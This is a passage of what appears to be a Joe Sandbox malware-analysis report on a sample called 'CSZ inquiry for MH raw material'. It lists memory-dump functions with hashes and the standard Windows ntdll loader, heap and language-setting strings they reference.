                                                                        • Instruction ID: 42d43db28bbc21dfa9e9f0a8dd90186bb472d34963c4df42bc6645c4dca2043c
                                                                        • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                        • Instruction Fuzzy Hash: 71E086326006147BC620FA59DC01F9B77ACDFC5710F104055FA0867146D6B079208BF4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 276 e02c0a-e02c0f 277 e02c11-e02c18 276->277 278 e02c1f-e02c26 LdrInitializeThunk 276->278
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1517b287e4bfefc46996c00f5170ed6f72bf59926859f70f9f559dd797a6841f
                                                                        • Instruction ID: e05b2cf2c88dddc75f008600fe0049be407674254e1db254710197e7895cd713
                                                                        • Opcode Fuzzy Hash: 1517b287e4bfefc46996c00f5170ed6f72bf59926859f70f9f559dd797a6841f
                                                                        • Instruction Fuzzy Hash: 50B09B719415C5C6EB51E760470D71B79406BD1705F55D076D3031685E4738C5D1F175
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 2d473c901172f749aac4e866b44f513ee56c619c09537b470ea75f94a52f9493
                                                                        • Instruction ID: cc19103a9adfc04c1ca448c6b87c2a579c6870b608aff3cdcc572ac96fa2eed9
                                                                        • Opcode Fuzzy Hash: 2d473c901172f749aac4e866b44f513ee56c619c09537b470ea75f94a52f9493
                                                                        • Instruction Fuzzy Hash: F292BA71608341AFE724DF24D881B6BB7E8FB88714F44592DFA94E7291D770E844CBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-3089669407
                                                                        • Opcode ID: 1397f3ba0b4c12be1d935f87e703d2edaec34289d8d6d7b003799b1b5e6a6a99
                                                                        • Instruction ID: e51bd09b9e20ed9f857ec3d0afb254e0452d0d95ab010f8c8ffda10a52700bb1
                                                                        • Opcode Fuzzy Hash: 1397f3ba0b4c12be1d935f87e703d2edaec34289d8d6d7b003799b1b5e6a6a99
                                                                        • Instruction Fuzzy Hash: A681FAB2D01619BF9B11EBE5EDD5EEF77BDAB04710B054622B901F7121E620DE488BB0
                                                                        Strings
                                                                        • LanguageConfigurationPending, xrefs: 00E66221
                                                                        • @, xrefs: 00E66027
                                                                        • InstallLanguageFallback, xrefs: 00E66050
                                                                        • @, xrefs: 00E66277
                                                                        • @, xrefs: 00E6647A
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00E6635D
                                                                        • PreferredUILanguagesPending, xrefs: 00E661D2
                                                                        • @, xrefs: 00E661B0
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00E65FE1
                                                                        • PreferredUILanguages, xrefs: 00E663D1
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 00E65A84
                                                                        • @, xrefs: 00E663A0
                                                                        • Control Panel\Desktop, xrefs: 00E6615E
                                                                        • LanguageConfiguration, xrefs: 00E66420
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1325123933
                                                                        • Opcode ID: acdb722587ba4ba2580098d990c321607da9b451d9b8a43f4769d4212d2bf02b
                                                                        • Instruction ID: 23860f86ae242bd61f943a3566b46fc05152548de9ae9063bf107ae1340b9359
                                                                        • Opcode Fuzzy Hash: acdb722587ba4ba2580098d990c321607da9b451d9b8a43f4769d4212d2bf02b
                                                                        • Instruction Fuzzy Hash: 207299726487418FD724DF28D841BABB7E9FB88744F40592EF985E7250EB30D905CBA2
                                                                        Strings
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00E354E2
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 00E35543
                                                                        • Critical section address, xrefs: 00E35425, 00E354BC, 00E35534
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00E354CE
                                                                        • Thread identifier, xrefs: 00E3553A
                                                                        • double initialized or corrupted critical section, xrefs: 00E35508
                                                                        • Invalid debug info address of this critical section, xrefs: 00E354B6
                                                                        • corrupted critical section, xrefs: 00E354C2
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00E3540A, 00E35496, 00E35519
                                                                        • 8, xrefs: 00E352E3
                                                                        • undeleted critical section in freed memory, xrefs: 00E3542B
                                                                        • Critical section debug info address, xrefs: 00E3541F, 00E3552E
                                                                        • Critical section address., xrefs: 00E35502
                                                                        • Address of the debug info found in the active list., xrefs: 00E354AE, 00E354FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: 622cafad9cb7d2923841cbb05e8bb8d1a9bd98e7b07cb8ec6c01bf375d717d4f
                                                                        • Instruction ID: 7b0c2b9a5f78133e899b83203f77a857c76b7c0f87fba39f5437a0803afc1d70
                                                                        • Opcode Fuzzy Hash: 622cafad9cb7d2923841cbb05e8bb8d1a9bd98e7b07cb8ec6c01bf375d717d4f
                                                                        • Instruction Fuzzy Hash: 1B818BB1A40758EFDF20CF98C845BAEBBB5FB09B14F248119F905B7280D7B5A944DB60
                                                                        Strings
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00E32506
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00E32409
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00E32498
                                                                        • @, xrefs: 00E3259B
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00E32412
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00E324C0
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00E325EB
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 00E3261F
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00E322E4
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00E32624
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00E32602
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: 77132a1981f730ab74af02d527353d6ba3f014a4410a669a9f46ab48fafa72f0
                                                                        • Instruction ID: 4b42fec42a4a1d3fda9c976f8be23c435ddcd1b7a51dcbec590df7a2d5d4e782
                                                                        • Opcode Fuzzy Hash: 77132a1981f730ab74af02d527353d6ba3f014a4410a669a9f46ab48fafa72f0
                                                                        • Instruction Fuzzy Hash: 83024EB1D002289BDB21DB14CC85BAEB7B8AF44704F5151EAE749B7241DB70AF84CF69
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                        • API String ID: 0-360209818
                                                                        • Opcode ID: c4350aa018e242b84e4067067a7f378ea63d9214eb4a7b78076c0f49c250af68
                                                                        • Instruction ID: c566e0cad39a096e0771fde433e5e7664eecce05211dccf2fbabcb1c13114dd8
                                                                        • Opcode Fuzzy Hash: c4350aa018e242b84e4067067a7f378ea63d9214eb4a7b78076c0f49c250af68
                                                                        • Instruction Fuzzy Hash: D062B0B5E00229CFDB24CF18C8457A9BBB2AF95314F5582DAE549BB240DB325EE1CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 89b18aeb1d33cd7007b77d188ad0b0e70223c51a9f9b334fc4c92eed28dc40fc
                                                                        • Instruction ID: 54858adcedc6d3bbe60409cd9f79eba1a9836c04229ebcd3651e8e38fc0ec8a3
                                                                        • Opcode Fuzzy Hash: 89b18aeb1d33cd7007b77d188ad0b0e70223c51a9f9b334fc4c92eed28dc40fc
                                                                        • Instruction Fuzzy Hash: 6751E3715583019BC724DF149948BABB7ECEF94384F144A1DB89893281EBB0D908CBB2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: 7120676bbe08068c190a2f2fb15741bc7a9e723885ed30fabb4cec4b58502073
                                                                        • Instruction ID: c037c91c7cd6c5fab5b9c5b70b168c7c5130f9f956e6f0680f435ac7bf18b8aa
                                                                        • Opcode Fuzzy Hash: 7120676bbe08068c190a2f2fb15741bc7a9e723885ed30fabb4cec4b58502073
                                                                        • Instruction Fuzzy Hash: 2C12AE30604742DFDB298F69C441BB6B7F1EF09714F18D49AE49AAB682D774EC80DB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-3197712848
                                                                        • Opcode ID: d2856b07ca152f8f2446d22b8dedd1a0f16df6df8aa590982799990dc585dc5b
                                                                        • Instruction ID: 56b876dd6d31928f175e2d310f3c1c9a058f53f491b498cb0ea65d4f2fec7d40
                                                                        • Opcode Fuzzy Hash: d2856b07ca152f8f2446d22b8dedd1a0f16df6df8aa590982799990dc585dc5b
                                                                        • Instruction Fuzzy Hash: C012DF71609351CFD724DF28C841BABB3E4EF84718F094A5AF8859B391EB74D944CBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                        • API String ID: 0-3532704233
                                                                        • Opcode ID: 2817640ff2ef7aef544ade53969c5fb3f226fbcae55c9cd9e8ac20ecc7a9a78c
                                                                        • Instruction ID: 404ecea050b784be8d570bcba68bdd13070cb5b109842f804b3d8806670b9ee3
                                                                        • Opcode Fuzzy Hash: 2817640ff2ef7aef544ade53969c5fb3f226fbcae55c9cd9e8ac20ecc7a9a78c
                                                                        • Instruction Fuzzy Hash: C9B18F71509355DFC725DF14C440AAFB7E9AF88754F09492EF88AE7240E730DD498BA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                        • API String ID: 0-1357697941
                                                                        • Opcode ID: 6bfdf33e7aaae0c7b8064fc4bbd615b870d209a1c53b8a85d68ea564150bee73
                                                                        • Instruction ID: edcecfede5c2553421ab61d648bc2202df23b07c052af71c7d5cd791b5fccba3
                                                                        • Opcode Fuzzy Hash: 6bfdf33e7aaae0c7b8064fc4bbd615b870d209a1c53b8a85d68ea564150bee73
                                                                        • Instruction Fuzzy Hash: 71F1E231A00785EFDB25CF68C441BEAB7F5FF09718F049459E58AAB292C770AD85CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 1905731f68d986b7dd369bf754e4e7061393c280e62e401493bd8a2bb888e1e5
                                                                        • Instruction ID: d5b52f9566dfae7801d89886040959fdd7c782ecb51a2780a7fd0f3bf7773b43
                                                                        • Opcode Fuzzy Hash: 1905731f68d986b7dd369bf754e4e7061393c280e62e401493bd8a2bb888e1e5
                                                                        • Instruction Fuzzy Hash: B1D1F131500685EFCB22DF69C451AAEBBF1FF49714F08D05AE44AAB6A2D734E944CF24
                                                                        Strings
                                                                        • VerifierFlags, xrefs: 00E48C50
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00E48A3D
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00E48A67
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 00E48B8F
                                                                        • VerifierDlls, xrefs: 00E48CBD
                                                                        • VerifierDebug, xrefs: 00E48CA5
                                                                        • HandleTraces, xrefs: 00E48C8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: 43b89df027a0825470ede7b1b45f7a0378e2adc81896462c9514c3acb4755491
                                                                        • Instruction ID: 7ed1e7dd3cb6b774a99e3e695548f2cb5c6b9269770b8576d7fb358b541b4626
                                                                        • Opcode Fuzzy Hash: 43b89df027a0825470ede7b1b45f7a0378e2adc81896462c9514c3acb4755491
                                                                        • Instruction Fuzzy Hash: 21913772A46711EFC711EF68A981B6FB3E8EB85714F051919FA417B2A2CB709C04C7B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • API String ID: 0-1109411897
                                                                        • Opcode ID: 50f9d7ba4f81ae9ce6a3b0c015e976f7cd38a008422732553b22c0267aedc7d3
                                                                        • Instruction ID: 92ce53e756200abb101152e7fe7e00d49d8eeb7bc881bc3e65e3642279c95474
                                                                        • Opcode Fuzzy Hash: 50f9d7ba4f81ae9ce6a3b0c015e976f7cd38a008422732553b22c0267aedc7d3
                                                                        • Instruction Fuzzy Hash: 63A23AB4A0562ACFDB64DF14DC88BA9B7B5AF45304F2442EEE45DA7290DB309E85CF10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        • Opcode ID: 1cd2effd36bcc6573f9ac13f96e2fcf35f2bd29d7e03105b3d3c67dec47b0787
                                                                        • Instruction ID: 301e4104e2f0968b0e0a9b9768fb8f2bf7e10aa685e516b5fe4985377b21f94a
                                                                        • Opcode Fuzzy Hash: 1cd2effd36bcc6573f9ac13f96e2fcf35f2bd29d7e03105b3d3c67dec47b0787
                                                                        • Instruction Fuzzy Hash: 0742DC31208681DFC715DF28C884BAABBE5FF88704F185969F886DB352D734D985CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                        • API String ID: 0-4098886588
                                                                        • Opcode ID: 20c10e8080135f9fea6649863dec47036c60d43108673439a9dcf2f49411fbd7
                                                                        • Instruction ID: c937624ff0408f7d2dbaed9f9de1a6af7b7a5a75eae3e65222ffa1b2995264ac
                                                                        • Opcode Fuzzy Hash: 20c10e8080135f9fea6649863dec47036c60d43108673439a9dcf2f49411fbd7
                                                                        • Instruction Fuzzy Hash: C632AD70A0026A8BDB22CF14C895FEEB7B5AF45354F2841EAE849B7251D735DF818F60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-122214566
                                                                        • Opcode ID: 3a73b0418ecda34a5da165213c1b2cc51d33ce25a60221a34f6f4610b2cf469e
                                                                        • Instruction ID: 0a2eefb1d49a747d3753a83fa3e26e8d3222341ac1bd87b900efc64ea76cc4b5
                                                                        • Opcode Fuzzy Hash: 3a73b0418ecda34a5da165213c1b2cc51d33ce25a60221a34f6f4610b2cf469e
                                                                        • Instruction Fuzzy Hash: 53C16B31A00226EBCF24DB64C881B7E7BA5EF45728F19416BE855AB391DB70CD44D3B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: a290807ccb532d6873212c5ba368d09a89663a6aeacea63f0df25155839c1a94
                                                                        • Instruction ID: 46ba4b0658b5b567e61acb16d2af2127a6b489e6bf7b7fb66ff2757c7a31303b
                                                                        • Opcode Fuzzy Hash: a290807ccb532d6873212c5ba368d09a89663a6aeacea63f0df25155839c1a94
                                                                        • Instruction Fuzzy Hash: 929147B1A047249FDB25EF24DC4ABBB3BA0AB41B18F155229FA40776D1DB74EC44C7A0
                                                                        Strings
                                                                        • apphelp.dll, xrefs: 00DB6496
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00E19A11, 00E19A3A
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00E199ED
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00E19A2A
                                                                        • LdrpInitShimEngine, xrefs: 00E199F4, 00E19A07, 00E19A30
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00E19A01
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-204845295
                                                                        • Opcode ID: f19750b34bcb04ef83f57c77c2f1d0dfe4e38969711adee726a596d41e026683
                                                                        • Instruction ID: 4fd860db528fee392cfa8d8bf3b13f689117fb6f7e3c709a9df25fffca727e55
                                                                        • Opcode Fuzzy Hash: f19750b34bcb04ef83f57c77c2f1d0dfe4e38969711adee726a596d41e026683
                                                                        • Instruction Fuzzy Hash: 42519071208304DFD324DF25D892BAB77E4FF84744F54491AF586A72A2DB30E948CBA2
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00DFC6C3
                                                                        • LdrpInitializeImportRedirection, xrefs: 00E38177, 00E381EB
                                                                        • LdrpInitializeProcess, xrefs: 00DFC6C4
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 00E381E5
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 00E38170
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 00E38181, 00E381F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 652863a534bbe6eff50b7b44d08bc1bceacdbef8c62db6448aed2c0a8b6db404
                                                                        • Instruction ID: e6f8a1405409231d3d2503e6bf3a14d208b032a048c8a4f61d249009ec5112bc
                                                                        • Opcode Fuzzy Hash: 652863a534bbe6eff50b7b44d08bc1bceacdbef8c62db6448aed2c0a8b6db404
                                                                        • Instruction Fuzzy Hash: 273102B17483459FC214EF29DD46E2BB7D5EF84B10F050558F984AB2E2EA20ED08C7B2
                                                                        Strings
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 00E32160, 00E3219A, 00E321BA
